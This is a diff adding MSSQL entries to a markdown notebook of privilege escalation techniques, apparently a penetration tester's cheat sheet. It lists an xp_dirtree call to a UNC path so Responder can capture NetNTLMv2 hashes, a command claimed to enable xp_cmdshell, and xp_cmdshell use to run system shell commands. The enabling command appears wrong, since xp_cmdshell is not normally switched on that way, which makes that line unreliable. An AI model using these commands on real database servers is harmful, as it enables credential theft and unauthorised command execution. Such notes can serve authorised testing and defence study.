| ... | ... | @@ -8,3 +8,8 @@ A place to keep track of various priv esc techniques used, separated by platform |
|
|
|
|
|
|
|
PS Transcripts are very helpful. Search text files for `Windows PowerShell transcript start`
|
|
|
|
|
|
|
|
# MSSQL
|
|
|
|
|
|
|
|
`EXEC master.sys.xp_dirtree '\\mynetworkpath\folder1\'` creates a network call to a host, responder can collect netntlmv2 hash
|
|
|
|
`EXEC master.sys.xp_cmdshell_enable; RECONFIGURE` to enable xp_cmdshell
|
|
|
|
`EXEC master.sys.xp_cmdshell cmd` run shell commands as current system user |
|
|
\ No newline at end of file |
